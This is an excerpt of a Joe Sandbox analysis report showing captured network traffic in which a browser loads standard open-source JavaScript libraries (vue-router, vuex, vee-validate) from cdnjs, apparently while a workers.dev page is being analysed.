2024-02-09 10:09:44 UTC	1369	IN	Data Raw: 72 2c 6d 65 74 61 3a 6e 2e 6d 65 74 61 7c 7c 7b 7d 2c 70 72 6f 70 73 3a 6e 75 6c 6c 3d 3d 6e 2e 70 72 6f 70 73 3f 7b 7d 3a 6e 2e 63 6f 6d 70 6f 6e 65 6e 74 73 3f 6e 2e 70 72 6f 70 73 3a 7b 64 65 66 61 75 6c 74 3a 6e 2e 70 72 6f 70 73 7d 7d 3b 6e 2e 63 68 69 6c 64 72 65 6e 26 26 6e 2e 63 68 69 6c 64 72 65 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6f 3d 69 3f 67 28 69 2b 22 2f 22 2b 6e 2e 70 61 74 68 29 3a 76 6f 69 64 20 30 3b 4c 28 74 2c 65 2c 72 2c 6e 2c 70 2c 6f 29 7d 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 2e 61 6c 69 61 73 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 2e 61 6c 69 61 73 29 3f 6e 2e 61 6c 69 61 73 3a 5b 6e 2e 61 6c 69 61 73 5d 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 Data Ascii: r,meta:n.meta\|\|{},props:null==n.props?{}:n.components?n.props:{default:n.props}};n.children&&n.children.forEach(function(n){var o=i?g(i+"/"+n.path):void 0;L(t,e,r,n,p,o)}),void 0!==n.alias&&(Array.isArray(n.alias)?n.alias:[n.alias]).forEach(function(i){va
2024-02-09 10:09:44 UTC	1369	IN	Data Raw: 6d 73 29 26 26 66 2e 69 6e 64 65 78 4f 66 28 68 29 3e 2d 31 26 26 28 6f 2e 70 61 72 61 6d 73 5b 68 5d 3d 72 2e 70 61 72 61 6d 73 5b 68 5d 29 3b 69 66 28 75 29 72 65 74 75 72 6e 20 6f 2e 70 61 74 68 3d 53 28 75 2e 70 61 74 68 2c 6f 2e 70 61 72 61 6d 73 2c 27 6e 61 6d 65 64 20 72 6f 75 74 65 20 22 27 2b 61 2b 27 22 27 29 2c 69 28 75 2c 6f 2c 6e 29 7d 65 6c 73 65 20 69 66 28 6f 2e 70 61 74 68 29 7b 6f 2e 70 61 72 61 6d 73 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 63 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 7b 76 61 72 20 64 3d 63 5b 6c 5d 2c 79 3d 73 5b 64 5d 3b 69 66 28 56 28 79 2e 72 65 67 65 78 2c 6f 2e 70 61 74 68 2c 6f 2e 70 61 72 61 6d 73 29 29 72 65 74 75 72 6e 20 69 28 79 2c 6f 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 69 28 6e 75 6c 6c 2c 6f 29 7d Data Ascii: ms)&&f.indexOf(h)>-1&&(o.params[h]=r.params[h]);if(u)return o.path=S(u.path,o.params,'named route "'+a+'"'),i(u,o,n)}else if(o.path){o.params={};for(var l=0;l<c.length;l++){var d=c[l],y=s[d];if(V(y.regex,o.path,o.params))return i(y,o,n)}}return i(null,o)}
2024-02-09 10:09:44 UTC	1369	IN	Data Raw: 29 7b 72 65 74 75 72 6e 20 76 28 74 2c 65 2e 70 61 72 65 6e 74 3f 65 2e 70 61 72 65 6e 74 2e 70 61 74 68 3a 22 2f 22 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 29 7b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 6f 70 73 74 61 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 44 28 29 2c 74 2e 73 74 61 74 65 26 26 74 2e 73 74 61 74 65 2e 6b 65 79 26 26 5a 28 74 2e 73 74 61 74 65 2e 6b 65 79 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 74 2c 65 2c 72 2c 6e 29 7b 69 66 28 74 2e 61 70 70 29 7b 76 61 72 20 6f 3d 74 2e 6f 70 74 69 6f 6e 73 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 3b 6f 26 26 74 2e 61 70 70 2e 24 6e 65 78 74 54 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 4b 28 29 2c 69 3d 6f 28 65 2c 72 Data Ascii: ){return v(t,e.parent?e.parent.path:"/",!0)}function B(){window.addEventListener("popstate",function(t){D(),t.state&&t.state.key&&Z(t.state.key)})}function F(t,e,r,n){if(t.app){var o=t.options.scrollBehavior;o&&t.app.$nextTick(function(){var t=K(),i=o(e,r
2024-02-09 10:09:44 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 20 6e 74 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 2c 6f 29 7b 76 61 72 20 69 3d 21 31 2c 61 3d 30 2c 75 3d 6e 75 6c 6c 3b 6f 74 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 63 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 76 6f 69 64 20 30 3d 3d 3d 74 2e 63 69 64 29 7b 69 3d 21 30 2c 61 2b 2b 3b 76 61 72 20 73 2c 70 3d 61 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 26 26 65 2e 64 65 66 61 75 6c 74 26 26 28 65 3d 65 2e 64 65 66 61 75 6c 74 29 2c 74 2e 72 65 73 6f 6c 76 65 64 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 4f 74 2e 65 78 74 65 6e 64 28 65 29 2c 6e 2e 63 6f 6d 70 6f 6e 65 6e 74 73 5b 63 5d 3d Data Ascii: unction nt(t){return function(r,n,o){var i=!1,a=0,u=null;ot(t,function(t,r,n,c){if("function"==typeof t&&void 0===t.cid){i=!0,a++;var s,p=at(function(e){e.__esModule&&e.default&&(e=e.default),t.resolved="function"==typeof e?e:Ot.extend(e),n.components[c]=

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:46 UTC	570	OUT	GET /ajax/libs/vuex/2.3.1/vuex.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:46 UTC	948	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:46 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb0402f-290d" Last-Modified: Mon, 04 May 2020 16:17:51 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: MISS Expires: Wed, 29 Jan 2025 10:09:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sTgGIqiupMt3zysB1j1O9S9DS5nu1nntzWLOYo33GO%2FitgbQlNLqpzcD7F6%2F1y06mi05C%2F4uBatiBJ3k2iLNOAU3M6wfdQKteWkDoERSc%2F0dc6LJi3MNxOI8YI67lf7X9EEcaOZw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 852b51984c1fad74-ATL alt-svc: h3=":443"; ma=86400
2024-02-09 10:09:46 UTC	421	IN	Data Raw: 32 39 30 64 0d 0a 2f 2a 2a 0a 20 2a 20 76 75 65 78 20 76 32 2e 33 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 37 20 45 76 61 6e 20 59 6f 75 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 74 2e 56 75 65 78 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 Data Ascii: 290d/** * vuex v2.3.0 * (c) 2017 Evan You * @license MIT */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):t.Vuex=e()}(this,function(){"use strict";function t(t)
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 69 6f 6e 20 65 28 74 2c 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 28 74 5b 6e 5d 2c 6e 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 74 68 65 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 69 66 28 21 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 5b 76 75 65 78 5d 20 22 2b 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 69 66 28 74 2e 75 70 64 61 74 65 28 65 29 2c 65 2e 6d 6f 64 75 6c 65 Data Ascii: ion e(t,e){Object.keys(t).forEach(function(n){return e(t[n],n)})}function n(t){return null!==t&&"object"==typeof t}function o(t){return t&&"function"==typeof t.then}function r(t,e){if(!t)throw new Error("[vuex] "+e)}function i(t,e){if(t.update(e),e.module
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 72 45 61 63 68 41 63 74 69 6f 6e 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 6f 3d 73 2b 6e 3b 70 28 74 2c 6f 2c 65 2c 64 29 7d 29 2c 6f 2e 66 6f 72 45 61 63 68 47 65 74 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 6f 3d 73 2b 6e 3b 68 28 74 2c 6f 2c 65 2c 64 29 7d 29 2c 6f 2e 66 6f 72 45 61 63 68 43 68 69 6c 64 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 75 28 74 2c 65 2c 6e 2e 63 6f 6e 63 61 74 28 69 29 2c 6f 2c 72 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 22 22 3d 3d 3d 65 2c 72 3d 7b 64 69 73 70 61 74 63 68 3a 6f 3f 74 2e 64 69 73 70 61 74 63 68 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 72 29 7b 76 61 72 20 69 3d 76 28 6e 2c 6f 2c 72 29 2c 73 3d 69 2e 70 61 79 6c 6f 61 64 2c Data Ascii: rEachAction(function(e,n){var o=s+n;p(t,o,e,d)}),o.forEachGetter(function(e,n){var o=s+n;h(t,o,e,d)}),o.forEachChild(function(o,i){u(t,e,n.concat(i),o,r)})}function c(t,e,n){var o=""===e,r={dispatch:o?t.dispatch:function(n,o,r){var i=v(n,o,r),s=i.payload,
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 2e 5f 64 65 76 74 6f 6f 6c 48 6f 6f 6b 2e 65 6d 69 74 28 22 76 75 65 78 3a 65 72 72 6f 72 22 2c 65 29 2c 65 7d 29 3a 73 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 2c 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 74 2e 5f 77 72 61 70 70 65 64 47 65 74 74 65 72 73 5b 65 5d 3f 76 6f 69 64 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5b 76 75 65 78 5d 20 64 75 70 6c 69 63 61 74 65 20 67 65 74 74 65 72 20 6b 65 79 3a 20 22 2b 65 29 3a 76 6f 69 64 28 74 2e 5f 77 72 61 70 70 65 64 47 65 74 74 65 72 73 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2e 73 74 61 74 65 2c 6f 2e 67 65 74 74 65 72 73 2c 74 2e 73 74 61 74 65 2c 74 2e 67 65 74 74 65 72 73 29 7d 29 7d 66 75 Data Ascii: ch(function(e){throw t._devtoolHook.emit("vuex:error",e),e}):s})}function h(t,e,n,o){return t._wrappedGetters[e]?void console.error("[vuex] duplicate getter key: "+e):void(t._wrappedGetters[e]=function(t){return n(o.state,o.getters,t.state,t.getters)})}fu
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 69 66 65 63 79 63 6c 65 48 6f 6f 6b 73 2e 69 6e 64 65 78 4f 66 28 22 69 6e 69 74 22 29 3e 2d 31 3b 74 2e 6d 69 78 69 6e 28 6f 3f 7b 69 6e 69 74 3a 65 7d 3a 7b 62 65 66 6f 72 65 43 72 65 61 74 65 3a 65 7d 29 7d 65 6c 73 65 7b 76 61 72 20 72 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 6e 69 74 3b 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 7b 7d 29 2c 74 2e 69 6e 69 74 3d 74 2e 69 6e 69 74 3f 5b 65 5d 2e 63 6f 6e 63 61 74 28 74 2e 69 6e 69 74 29 3a 65 2c 72 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 7d 7d 7d 2c 78 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 5f 5f 56 55 45 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c Data Ascii: ifecycleHooks.indexOf("init")>-1;t.mixin(o?{init:e}:{beforeCreate:e})}else{var r=t.prototype._init;t.prototype._init=function(t){void 0===t&&(t={}),t.init=t.init?[e].concat(t.init):e,r.call(this,t)}}},x="undefined"!=typeof window&&window.__VUE_DEVTOOLS_GL
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 5b 65 5d 2c 74 2c 21 31 29 7d 29 7d 3b 4d 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 67 65 74 43 68 69 6c 64 28 65 29 7d 2c 74 68 69 73 2e 72 6f 6f 74 29 7d 2c 4d 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4e 61 6d 65 73 70 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 72 6f 6f 74 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 3d 65 2e 67 65 74 43 68 69 6c 64 28 6e 29 2c 74 2b 28 65 2e 6e 61 6d 65 73 70 61 63 65 64 3f 6e 2b 22 2f 22 3a 22 22 29 7d 2c 22 22 29 7d 2c 4d 2e 70 72 6f 74 6f 74 79 70 65 2e Data Ascii: [e],t,!1)})};M.prototype.get=function(t){return t.reduce(function(t,e){return t.getChild(e)},this.root)},M.prototype.getNamespace=function(t){var e=this.root;return t.reduce(function(t,n){return e=e.getChild(n),t+(e.namespaced?n+"/":"")},"")},M.prototype.
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 28 74 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 28 6e 29 7d 29 7d 2c 6a 3d 7b 73 74 61 74 65 3a 7b 7d 7d 3b 6a 2e 73 74 61 74 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 6d 2e 5f 64 61 74 61 2e 24 24 73 74 61 74 65 7d 2c 6a 2e 73 74 61 74 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 28 21 31 2c 22 55 73 65 20 73 74 6f 72 65 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 29 20 74 6f 20 65 78 70 6c 69 63 69 74 20 72 65 70 6c 61 63 65 20 73 74 6f 72 65 20 73 74 61 74 65 2e 22 29 7d 2c 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 72 3d 76 28 74 2c 65 2c 6e 29 2c 69 Data Ascii: (t).forEach(function(t){return t(n)})},j={state:{}};j.state.get=function(){return this._vm._data.$$state},j.state.set=function(t){r(!1,"Use store.replaceState() to explicit replace store state.")},k.prototype.commit=function(t,e,n){var o=this,r=v(t,e,n),i
2024-02-09 10:09:46 UTC	1369	IN	Data Raw: 5d 29 2c 72 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 2c 22 6d 6f 64 75 6c 65 20 70 61 74 68 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 20 6f 72 20 61 6e 20 41 72 72 61 79 2e 22 29 2c 74 68 69 73 2e 5f 6d 6f 64 75 6c 65 73 2e 72 65 67 69 73 74 65 72 28 74 2c 65 29 2c 75 28 74 68 69 73 2c 74 68 69 73 2e 73 74 61 74 65 2c 74 2c 74 68 69 73 2e 5f 6d 6f 64 75 6c 65 73 2e 67 65 74 28 74 29 29 2c 61 28 74 68 69 73 2c 74 68 69 73 2e 73 74 61 74 65 29 7d 2c 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 72 65 67 69 73 74 65 72 4d 6f 64 75 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 5b 74 5d 29 2c 72 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 Data Ascii: ]),r(Array.isArray(t),"module path must be a string or an Array."),this._modules.register(t,e),u(this,this.state,t,this._modules.get(t)),a(this,this.state)},k.prototype.unregisterModule=function(t){var e=this;"string"==typeof t&&(t=[t]),r(Array.isArray(t)
2024-02-09 10:09:46 UTC	513	IN	Data Raw: 69 73 2e 24 73 74 6f 72 65 2c 22 6d 61 70 47 65 74 74 65 72 73 22 2c 74 29 29 72 65 74 75 72 6e 20 72 20 69 6e 20 74 68 69 73 2e 24 73 74 6f 72 65 2e 67 65 74 74 65 72 73 3f 74 68 69 73 2e 24 73 74 6f 72 65 2e 67 65 74 74 65 72 73 5b 72 5d 3a 76 6f 69 64 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5b 76 75 65 78 5d 20 75 6e 6b 6e 6f 77 6e 20 67 65 74 74 65 72 3a 20 22 2b 72 29 7d 2c 6e 5b 6f 5d 2e 76 75 65 78 3d 21 30 7d 29 2c 6e 7d 29 2c 56 3d 67 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 7b 7d 3b 72 65 74 75 72 6e 20 5f 28 65 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6b 65 79 2c 72 3d 65 2e 76 61 6c 3b 72 3d 74 2b 72 2c 6e 5b 6f 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 Data Ascii: is.$store,"mapGetters",t))return r in this.$store.getters?this.$store.getters[r]:void console.error("[vuex] unknown getter: "+r)},n[o].vuex=!0}),n}),V=g(function(t,e){var n={};return _(e).forEach(function(e){var o=e.key,r=e.val;r=t+r,n[o]=function(){for(v
2024-02-09 10:09:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:47 UTC	591	OUT	GET /ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:48 UTC	952	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:48 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb04018-a668" Last-Modified: Mon, 04 May 2020 16:17:28 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: MISS Expires: Wed, 29 Jan 2025 10:09:48 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sR8%2BfKHPiH553RdOTNxCWTQgQQxHNXe2meZwna%2FzK0EH0IjEmZCOrUKp%2BG5k5%2Fq3E2nrr7IYdFeGCULKR7bi0qa5VyC4%2F7wyqq%2FYGufRMeEmeGWDvIyysxyBgyQoM56Qsr9KJoow"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 852b51a26a42b02c-ATL alt-svc: h3=":443"; ma=86400
2024-02-09 10:09:48 UTC	417	IN	Data Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 65 2e 56 65 65 56 61 6c 69 64 61 74 65 3d 74 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 72 Data Ascii: 7bef!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):e.VeeValidate=t()}(this,function(){"use strict";function e(e){return e&&e.__esModule?e.default:e}function t(e,t){r
2024-02-09 10:09:48 UTC	1369	IN	Data Raw: 5b 41 2d 5a c3 81 c3 89 c3 8d c3 91 c3 93 c3 9a c3 9c 5d 2a 24 2f 69 2c 66 72 3a 2f 5e 5b 41 2d 5a c3 80 c3 82 c3 86 c3 87 c3 89 c3 88 c3 8a c3 8b c3 8f c3 8e c3 94 c5 92 c3 99 c3 9b c3 9c c5 b8 5d 2a 24 2f 69 2c 6e 6c 3a 2f 5e 5b 41 2d 5a c3 89 c3 8b c3 8f c3 93 c3 96 c3 9c 5d 2a 24 2f 69 2c 68 75 3a 2f 5e 5b 41 2d 5a c3 81 c3 89 c3 8d c3 93 c3 96 c5 90 c3 9a c3 9c c5 b0 5d 2a 24 2f 69 2c 70 6c 3a 2f 5e 5b 41 2d 5a c4 84 c4 86 c4 98 c5 9a c5 81 c5 83 c3 93 c5 bb c5 b9 5d 2a 24 2f 69 2c 70 74 3a 2f 5e 5b 41 2d 5a c3 83 c3 81 c3 80 c3 82 c3 87 c3 89 c3 8a c3 8d c3 95 c3 93 c3 94 c3 9a c3 9c 5d 2a 24 2f 69 2c 72 75 3a 2f 5e 5b d0 90 2d d0 af d0 81 5d 2a 24 2f 69 2c 73 72 3a 2f 5e 5b 41 2d 5a c4 8c c4 86 c5 bd c5 a0 c4 90 5d 2a 24 2f 69 2c 74 72 3a 2f 5e 5b Data Ascii: [A-Z]$/i,fr:/^[A-Z]$/i,nl:/^[A-Z]$/i,hu:/^[A-Z]$/i,pl:/^[A-Z]$/i,pt:/^[A-Z]$/i,ru:/^[-]$/i,sr:/^[A-Z]$/i,tr:/^[
2024-02-09 10:09:48 UTC	1369	IN	Data Raw: 5a c3 87 c4 9e c4 b0 c4 b1 c3 96 c5 9e c3 9c 5d 2a 24 2f 69 2c 75 6b 3a 2f 5e 5b 30 2d 39 d0 90 2d d0 a9 d0 ac d0 ae d0 af d0 84 49 d0 87 d2 90 5d 2a 24 2f 69 2c 61 72 3a 2f 5e 5b d9 a0 d9 a1 d9 a2 d9 a3 d9 a4 d9 a5 d9 a6 d9 a7 d9 a8 d9 a9 30 2d 39 d8 a1 d8 a2 d8 a3 d8 a4 d8 a5 d8 a6 d8 a7 d8 a8 d8 a9 d8 aa d8 ab d8 ac d8 ad d8 ae d8 af d8 b0 d8 b1 d8 b2 d8 b3 d8 b4 d8 b5 d8 b6 d8 b7 d8 b8 d8 b9 d8 ba d9 81 d9 82 d9 83 d9 84 d9 85 d9 86 d9 87 d9 88 d9 89 d9 8a d9 8b d9 8c d9 8d d9 8e d9 8f d9 90 d9 91 d9 92 d9 b0 5d 2a 24 2f 7d 2c 73 3d 7b 65 6e 3a 2f 5e 5b 30 2d 39 41 2d 5a 5f 2d 5d 2a 24 2f 69 2c 63 73 3a 2f 5e 5b 30 2d 39 41 2d 5a c3 81 c4 8c c4 8e c3 89 c4 9a c3 8d c5 87 c3 93 c5 98 c5 a0 c5 a4 c3 9a c5 ae c3 9d c5 bd 5f 2d 5d 2a 24 2f 69 2c 64 61 3a Data Ascii: 